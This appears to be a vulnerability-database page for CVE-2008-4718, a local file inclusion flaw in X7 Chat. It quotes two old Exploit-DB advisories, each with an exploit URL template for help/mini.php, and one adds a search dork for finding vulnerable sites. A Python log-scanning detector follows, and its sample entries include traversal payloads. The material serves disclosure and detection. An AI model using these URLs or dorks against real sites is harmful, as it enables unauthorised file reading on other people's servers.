CVE-2008-4718
Published 2008-10-23
Priority P344 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.67% (83.8th percentile)
Directory traversal vulnerability in help/mini.php in X7 Chat 2.0.1 A1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the help_file parameter, a different vector than CVE-2006-2156.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| x7_group | x7_chat | <= 2.0.1 | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
| x7_group | x7_chat | — | — |
No detection rules found.
Exploit-DB
X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion
exploitdb·2008-09-27
---
[o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");
[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]%00
[o] Dork
"powered by x7 chat"
[o] Greetz
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke
# milw0rm.com [2008-09-27]
Exploit-DB
X7 Chat 2.0.1A1 - Local File Inclusion
exploitdb·2008-09-27
---
-- JIKI Team [ JIKO + KIl1er + merwan-neo ] ---
# Author : jiko
# email : [email protected]
# Home : www.no-exploit.Com
# Script : X7 Chat Version 2.0.1
# Bug : Local File Inclusion Vulnerability
=========================JIkI Team===================
# Exploit :
http://localhost/[script]/help/mini.php?help_file=[file]
=========================JIKI Team===================
greetz : all my friends and all No-back members and tryag.Com Gold_M
Cochlain , Hcj , Hassin X , all muslims
visit: www.no-back.org & www.tryag.com & ==> www.no-exploit.Com
-- JIKI Team [ JIKO + KIl1er ] --
------== troops of Mohamed coming inchalah =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc
# milw0rm.com [2008-09-27]
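An added detection example (not part of the advisories above or of X7 Chat): a Python check that scans web-server access logs for requests to help/mini.php whose help_file value contains a null byte, a parent-directory segment or an absolute path, decoding repeatedly so double-encoded input is also caught. The combined log format, the /chat/ install path and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_help_file(target):
    """Return the reasons a request target matches the CVE-2008-4718 pattern."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/help/mini.php"):
        return []
    reasons = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get("help_file", []):
        value = fully_decode(raw)
        if "\x00" in value:
            reasons.append("null byte")
        if ".." in value.replace("\\", "/").split("/"):
            reasons.append("parent-directory segment")
        if value.startswith(("/", "\\")):
            reasons.append("absolute path")
    return reasons

def scan(lines):
    """Yield (line_number, reasons) for each flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = suspicious_help_file(match.group(1)) if match else []
        if reasons:
            yield number, reasons

# Constructed sample entries (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2008:10:00:00 +0000] "GET /chat/help/mini.php?help_file=main.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Oct/2008:10:00:05 +0000] "GET /chat/help/mini.php?help_file=../../logs/app.log%00 HTTP/1.1" 200 90',
    '192.0.2.12 - - [01/Oct/2008:10:00:09 +0000] "GET /chat/help/mini.php?help_file=%252e%252e%252fconfig.php HTTP/1.1" 200 77',
    '192.0.2.13 - - [01/Oct/2008:10:00:12 +0000] "GET /chat/index.php?help_file=../x HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

A 200 response on a flagged line only shows the request was served; confirming whether a file was actually included requires checking the application and PHP error logs for the same timestamp.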
No writeups or analysis indexed.
http://securityreason.com/securityalert/4499
https://exchange.xforce.ibmcloud.com/vulnerabilities/45495
https://www.exploit-db.com/exploits/6592
https://www.exploit-db.com/exploits/6607
Published: 2008-10-23